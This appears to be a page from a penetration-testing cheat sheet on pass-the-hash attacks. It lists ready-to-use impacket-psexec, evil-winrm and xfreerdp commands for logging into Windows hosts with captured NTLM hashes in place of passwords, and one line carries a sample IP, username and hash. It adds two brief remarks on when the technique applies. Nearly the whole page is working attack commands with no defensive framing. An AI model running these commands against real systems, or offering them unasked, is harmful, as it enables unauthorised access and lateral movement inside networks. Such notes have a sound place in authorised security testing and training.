Pass the hash

Pass the hash

impacket-psexec ‘<domain>/<user>@<ip>’ -hashes ‘<lmhash>:<nthash>’

impacket-psexec ‘<domain>/<user>@<ip>’ -hashes ‘:<nthash>’

impacket-psexec ‘<domain>/<user>@<ip>’ -hashes ‘<lmhash>:’

evil-winrm -i 192.168.50.220 -u deadmin -H sdcsvgv6ggfdb566516fsf

xfreerdp /u:<user> /d:<domain> /pth:<hash> /v:<ipAddr> /workarea /smart-sizing /cert:ignore +clipboard

Pass the hash can be used in NTLM Authentication case .

Since the 2014 security update, this technique can not be used to authenticate as any other local admin account.

PreviousLateral MovementNextOverPass the hash

Last updated